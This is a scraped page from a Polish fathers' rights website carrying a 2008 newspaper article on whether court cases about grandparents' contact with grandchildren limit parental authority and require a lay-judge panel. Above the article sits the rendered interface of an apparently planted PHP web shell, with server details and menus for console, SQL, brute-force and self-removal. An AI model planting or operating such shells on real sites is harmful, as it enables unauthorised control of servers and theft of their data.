W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-20 11:24:06
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.198.158.24
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Sąd umożliwi spotykanie się z wnukami
28.06.2008.
Jeśli jedno z rodziców przeszkadza w kontaktowaniu się dzieci z dziadkami, mogą oni zwrócić się do sądu rodzinnego o przyznanie im prawa do tych kontaktów. Sąd Najwyższy rozstrzygnie, czy uregulowanie tej kwestii jest równoznaczne z ograniczeniem władzy rodzicielskiej rodziców czy też nie wpływa na jej uszczuplenie, a co za tym idzie, czy w takich sprawach sąd orzeka jednoosobowo czy też w składzie jednego sędziego zawodowego i dwóch ławników.
Zwrócił się o to w pytaniu prawnym jeden z sądów okręgowych, do którego wpłynęła apelacja matki dwójki małoletnich dzieci niezgadzającej się z orzeczeniem sądu określającym częstotliwość i sposób kontraktowania się z nimi rodziców jej byłego męża. Dziadkowie domagali się przyznania im prawa do zabierania dzieci do swego domu co drugi tydzień od godziny 15 w piątek do godziny 19 w niedzielę oraz na dwa tygodnie wakacji letnich i pierwszy tydzień wakacji zimowych. Sąd I instancji przyznał im prawo do przebywania z wnukami w każdy piątek nieparzystego miesiąca od godziny 16 do 19.30 i w każdy drugi weekend czerwca od godziny 18 w piątek do godziny 18 w niedzielę, z noclegami u dziadków. Uwzględnił m.in. to, że w wyroku rozwodowym sąd przyznał prawo do częstych kontaktów z dziećmi ich ojcu. Ten zaś mieszka ze swymi rodzicami, a ich dziadkami.

W apelacji matka zarzucała przede wszystkim naruszenie przepisów proceduralnych wskutek nieuwzględnienia, jej zdaniem, przez sąd opinii biegłych rodzinnego ośrodka diagnostyczno-konsultacyjnego. Domagała się całkowitego oddalenia wniosku teściów o uregulowanie ich kontaktów z wnukami.

Sąd II instancji uznał, że w tej sprawie występuje zagadnienie prawne, które powinien rozstrzygnąć Sąd Najwyższy. Sprowadza się ono do pytania, czy jest to sprawa o ograniczenie władzy rodzicielskiej w rozumieniu art. 509 kodeksu postępowania cywilnego dotyczącego składu sądu. Zasada zapisana w art. 47 k.p.c. jest taka, że sprawy cywilne, a do nich należą sprawy rodzinne i opiekuńcze, rozpoznaje w I instancji sąd w składzie jednego sędziego, chyba że przepis szczególny stanowi inaczej. Takim szczególnym przepisem jest m.in. art. 509 k.p.c., w którym zapisano, że m.in. sprawy o pozbawianie lub ograniczenie władzy rodzicielskiej sąd rozpoznaje w składzie jednego sędziego i dwóch ławników.

Skład sądu to kwestia bardzo istotna. Rozpoznanie sprawy w składzie niewłaściwym, tj. sprzecznym z przepisami, oznacza w myśl art. 379 k.p.c. nieważność postępowania. Takie postępowanie trzeba zatem powtórzyć. W kwestii charakteru prawnego spraw o uregulowanie kontaktów dziadków z wnukami nie ma zgody. Niektóre sądy, uznając je za sprawy o ograniczenie władzy rodzicielskiej, rozstrzygają je w składzie ławniczym. Tak też zakwalifikował sprawy o uregulowanie kontaktów z małoletnim dzieckiem jednego z rodziców Sąd Najwyższy w uzasadnieniu uchwały 8 marca 2006 r. (sygn. III CZP 98/05) podjętej w składzie siedmiu sędziów. Przyjął w niej, że osobista styczność rodziców z dzieckiem należy do normatywnych składników władzy rodzicielskiej. Jednakże część sądów rodzinnych, opierając się na wcześniejszym orzecznictwie SN, uznaje, że sfera osobistej styczności z dzieckiem pozostaje poza władzą rodzicielską i nie wpływa na jej uszczuplenie. W konsekwencji rozpoznają one takie sprawy w składzie jednoosobowym.

Odpowiedź Sądu Najwyższego na wskazane pytanie prawne powinna usunąć te rozbieżności (uchwała będzie miała w SN sygn. III CZP 74/08).
Źródło : Rzeczpospolita Izabela Lewandowska
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


20.06.2018.